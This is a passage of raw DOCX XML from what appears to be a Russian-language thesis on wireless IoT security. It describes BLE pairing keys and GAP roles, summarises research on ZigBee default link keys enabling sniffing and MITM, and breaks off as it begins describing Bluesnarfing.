      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (CSRK) и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Identity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Resolving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (IRK).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>LTK используется для генерации 128-битного ключа для шифрования и аутентификации на канальном уровне, CSRK — для подписи данных на уровне ATT, а IRK — для генерации частных адресов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Протокол управления безопасностью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Manager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Protocol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (SMP), работающий поверх фиксированного канала уровня L2CAP, отслеживает выполнение всех трех этапов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Уязвимым местом BLE на текущий момент является незащищенность ни одного из реализованных в нем методов установления соединения от пассивного прослушивания. Однако, в следующих версиях BLE планируется использование эллиптической криптографической кривой и алгоритма обмена открытыми ключами (алгоритм </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Диффи-Хэлмана</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:t xml:space="preserve"> [23]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Уровень GAP и профили приложений</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Протокол GAP</w:t>
      </w:r>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t>Generic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t>Access</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t>Profile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC0109" w:rsidRPr="00DC0109">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> определяет роли устройств, режимы и процедуры обнаружения устройств и сервисов, управление установлением соединения и безопасностью. В BLE GAP выделяет четыре роли для контроллера — широковещательный, наблюдатель, периферийный и центральный.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Широковещательный узел может только передавать пакеты по каналам объявления и не поддерживает соединение с другими устройствами. Наблюдатель способен только прослушивать каналы объявлений, в частности, способен принимать пакеты, передаваемые широковещательным узлом. Центральные узлы представляют собой устройства, способные поддерживать несколько соединений, в то время как периферийные — это простые устройства, способные поддерживать одно соединение с центральным узлом. Роли центрального и периферийного узла предполагают, что устройство способно выполнять функции, соответственно, ведущего или ведомого . </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Устройство может поддерживать несколько ролей, но одновременно активной может быть только одна из них.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C07525" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Поверх GAP могут быть построены дополнительные профили приложений, обеспечивающие необходимую пользователю функциональность. В BLE поддерживается иерархия профилей — профиль верхнего уровня может использовать функции профиля низкого уровня.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00C07525" w:rsidP="00C07525">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003143D6" w:rsidRPr="002B5C0C" w:rsidRDefault="00DC0109" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc503991005"/>
      <w:r w:rsidRPr="00DC0109">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00825E5E">
        <w:t>УЯЗВИМОСТИ ПРОТОКОЛОВ</w:t>
      </w:r>
      <w:r w:rsidR="002F179C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C07525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BLUETOOTH</w:t>
      </w:r>
      <w:r w:rsidR="002F179C" w:rsidRPr="002B5C0C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C07525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZIGBEE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w:rsidR="002B5C0C" w:rsidRPr="00CA6DC7" w:rsidRDefault="00DC0109" w:rsidP="002B5C0C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc503991006"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="002B5C0C">
        <w:t xml:space="preserve">Уязвимости </w:t>
      </w:r>
      <w:r w:rsidR="002B5C0C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="002B5C0C" w:rsidRPr="003077A4" w:rsidRDefault="002B5C0C" w:rsidP="003077A4">
      <w:r>
        <w:t xml:space="preserve">Исследователи венской компании </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cognosec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> обнаружили в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>кри</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>тический</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> недочет, который способен скомпрометировать любой умный дом. Основная проблема заключается в том, что производители используют стандартные ключи связи (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) для своих устройств, в погоне за совмести- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>мостью</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> с устройствами других производителей, дешевизной и удобством пользователя.</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:t>[25]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Использование стандартных </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ставит под угрозу безопасность сети в целом. К тому же сам стандарт </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> недостаточно ответственно относится к вопросу безопасности и сохранности ключей, то есть безопасная инициализация и передача зашифрованных ключей внутри сети сильно уязвимы. При помощи простого </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>сниффинга</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> атакующий способен перехватить обмен ключами и внедриться в сеть, используя стандартный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. В итоге устройства оказываются открыты для MITM-атак, а сеть, активный сетевой ключ и все коммуникации внутри сети – скомпрометированы </w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t>].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> После опытов с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IoT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-лампочками, датчиками движения, датчиками температуры и дверными замками в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Cognosec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> был сделан вывод, что производители оснащают устройства для домашнего использования лишь необходимым минимумом функций, чтобы соответствовать минимальному стандарту. К сожалению, это обычная практика, не оставляющая пользователям выбора, даже если они хотят повысить стандарт безопасности на своем устройстве (хотя бы изменив пароли и установив дополнительное защитное ПО</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t>) [</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="003077A4" w:rsidRPr="003077A4">
        <w:t>[28]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A924A9">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> По мнению исследователей, эта проблема куда серьезнее недочетов в самом стандарте </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ZigBee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B5C0C" w:rsidRPr="00731752" w:rsidRDefault="00DC0109" w:rsidP="002B5C0C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc503991007"/>
      <w:r w:rsidRPr="00DC0109">
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>Основные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>технологии</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>атак</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>протокола</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731752" w:rsidRPr="00731752">
        <w:t>LE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRDefault="00731752" w:rsidP="00731752">
      <w:r w:rsidRPr="00731752">
        <w:t>Напрямую</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>касается</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>основном</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефонов,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>смартфонов,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>планшетов</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>ноутбуков,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>но</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>так</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>все</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>медицинская</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>информация</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>приходит</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>от</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>медицинского</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:lastRenderedPageBreak/>
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефон</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>смартфон,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>то</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>необходимо</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>учитывать</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>все</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вовлеченные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>обмен</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Беспроводный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>протокол</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>предлагает</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пользователю</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>множество</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>удобств,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>но</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>все</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>они</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сопряжены</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>риском</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>его</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>безопасного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использования.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00731752">
      <w:r w:rsidRPr="00731752">
        <w:t>На</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>сегодняшний</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>момент</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>наиболее</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>распространённые</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>протокол</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>LE</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="0095726D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc503991008"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Bluesnarfing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00731752">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluesnarfing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>злоумышленникам</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>получить</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>доступ</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройству</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>поддержкой</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
